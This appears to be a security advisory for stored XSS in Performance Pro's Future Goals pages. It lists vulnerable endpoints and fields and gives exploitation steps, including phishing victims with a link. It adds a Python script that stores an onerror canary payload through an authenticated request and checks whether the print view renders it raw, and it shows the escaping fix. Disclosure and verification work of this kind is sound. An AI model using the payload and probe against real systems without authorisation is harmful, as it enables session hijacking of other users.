# Stored XSS - Future Goals

## Stored XSS (authenticated)  <a href="#finding1" id="finding1"></a>

Performance Pro v3.19.17 and earlier is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities (persistent, Type II) reachable via authenticated POST requests to:

{% hint style="warning" %}
`/index.php?mode=mGoalSetup&job=edit&type_id=2&id=<goal_id>`
{% endhint %}

### Description

The application is vulnerable to multiple instances of stored (persistent) XSS in the Future Goals functionality. Malicious input supplied by an authenticated user is stored server-side and later inserted into the page without HTML encoding or sanitization. This allows arbitrary JavaScript to execute in the browser, and therefore the session, of any user who views the affected pages.

### Affected Endpoints and Parameters

**Input (create/update goal):**\
`POST /index.php?mode=mGoalSetup&job=edit&type_id=2&id=<goal_id>`\
Vulnerable fields:

* Goal Name
* Goal Notes (name field)
* Action Step Name
* Note Name

**Output (rendered when viewing/printing goals):**\
`GET /viewgoals.php?printview=1&type=future`\
Fields rendered without encoding:

* Goal Name
* Goal Description
* Action Step Description

***

### Exploitation

* As an authenticated user, inject JavaScript into any of the following Future Goals input fields and save the goal.
  * Goal Name
  * Goal Description
  * Action Step Name
  * Action Step Description
  * Note Name
* The payload is stored server-side, so no crafted URL is required: it executes whenever any user opens the goal's edit page or the print view (`/viewgoals.php?printview=1&type=future`). A link to either page can still be **sent** to a victim via phishing or social engineering to trigger execution sooner.
* When the victim loads the page, the application inserts the stored value into the HTML without sufficient encoding.
* **The victim's browser renders the injected payload**, allowing arbitrary script execution within the victim's session.
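The following is an added example, not code from the advisory or from Performance Pro, showing how a tester can verify this finding and what the fix looks like. It stores a canary payload (a `<img onerror>` tag with a unique token), then classifies the view/print response as "vulnerable" (raw payload present), "encoded" (only the entity-encoded form present) or "absent". `render_goal_row` is a stand-in for the server template: `encode=False` reproduces the behaviour described above, `encode=True` is the fix (HTML-entity-encode every stored value before it reaches the DOM). The two URL paths are taken from the advisory; the form field names, the goal id and the sample page are constructed assumptions, since the advisory names the UI labels rather than the POST parameters.

```python
"""Added example (not Performance Pro code): store a canary payload in a
Future Goals field and check whether the view/print page renders it unencoded."""
import html
import urllib.request
from urllib.parse import urlencode

# Constructed canary: a unique token so a match cannot be coincidental.
CANARY = "xss7f3a1"
PAYLOAD = f'<img src=x onerror="alert(\'{CANARY}\')">'

# Endpoints from the advisory; goal_id is filled in by the caller.
EDIT_PATH = "/index.php?mode=mGoalSetup&job=edit&type_id=2&id={goal_id}"
VIEW_PATH = "/viewgoals.php?printview=1&type=future"

# Assumed form parameter names (the advisory lists UI labels, not parameters).
DEFAULT_FIELDS = {"goal_name": PAYLOAD, "goal_notes": "probe"}


def render_goal_row(goal_name: str, notes: str, encode: bool) -> str:
    """Stand-in for the server-side template.
    encode=False mirrors the vulnerable rendering described in the finding;
    encode=True is the fix: entity-encode each stored value at output time."""
    esc = html.escape if encode else (lambda s: s)
    return (f"<tr><td class=goal>{esc(goal_name)}</td>"
            f"<td class=notes>{esc(notes)}</td></tr>")


def classify(page: str, payload: str) -> str:
    """Return 'vulnerable' if the raw payload appears in the page (it would
    execute), 'encoded' if only its HTML-escaped form appears, else 'absent'."""
    if payload in page:
        return "vulnerable"
    if html.escape(payload) in page or html.escape(payload, quote=False) in page:
        return "encoded"
    return "absent"


def build_probe_requests(base_url: str, goal_id: int, form_fields: dict) -> list:
    """Describe the store-then-view exchange as (method, url, body) tuples:
    one POST to the goal edit endpoint, then one GET of the print view."""
    post_url = base_url + EDIT_PATH.format(goal_id=goal_id)
    return [("POST", post_url, urlencode(form_fields)),
            ("GET", base_url + VIEW_PATH, None)]


def probe_live(base_url: str, goal_id: int, cookie: str,
               form_fields: dict = DEFAULT_FIELDS) -> dict:
    """Run the exchange against a real instance with an authenticated session
    cookie (the finding requires a logged-in user). Returns {field: verdict}
    based on the print view returned after the payload is stored."""
    headers = {"Cookie": cookie,
               "Content-Type": "application/x-www-form-urlencoded"}
    page = ""
    for method, url, body in build_probe_requests(base_url, goal_id, form_fields):
        req = urllib.request.Request(
            url, data=body.encode() if body else None, method=method, headers=headers)
        with urllib.request.urlopen(req) as resp:
            page = resp.read().decode("utf-8", errors="replace")
    return {name: classify(page, value) for name, value in form_fields.items()}


if __name__ == "__main__":
    # Offline demonstration on constructed pages: vulnerable vs. hardened rendering.
    for encode in (False, True):
        page = render_goal_row(PAYLOAD, "Q3 notes", encode=encode)
        print(f"encode={encode}: {classify(page, PAYLOAD)}")
```

In a live test, pass the session cookie of a low-privileged user to `probe_live`, then open the print view as a second account to confirm the payload executes in another user's session; a "vulnerable" verdict on the print view with a canary that only that account stored is the evidence to attach to the finding.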

### Example 1: XSS in Updating/Creating Future Goals

* Any of the highlighted fields is vulnerable to XSS when a goal is created or updated\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2Fb6DS6g30Atp7iROWfaTU%2Fimage.png?alt=media\&token=2d8fd364-e260-4bee-9017-e6c875cc338b)\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F9OaSWN7bsDwRXkj4ePH0%2Fimage.png?alt=media\&token=093c7554-d64d-4009-bcd3-36f1d14b7d2c)\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FJEScbQofKpCgtSHci0i5%2Fimage.png?alt=media\&token=2260bedd-46d9-4086-b85d-c66730bde60d)
* Successful XSS exploitation\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2Fim8t6dJsiiYfmZ2KEDrJ%2Fimage.png?alt=media\&token=b36271c3-008f-4328-bfdb-c797a46eda01)

### Example 2: XSS in View/Print of Future Goals

* Any of the highlighted fields is vulnerable to XSS in the View/Print page\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FbnzcCzlecAZ1nC7DDJ7r%2Fimage.png?alt=media\&token=90d3ff9d-8681-4963-9f99-75c220688602)
* Successful XSS exploitation\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FtjB31qiuzw4wfzp3oeky%2Fimage.png?alt=media\&token=57c3c22e-0080-4c0b-a61e-735bcbdce281)
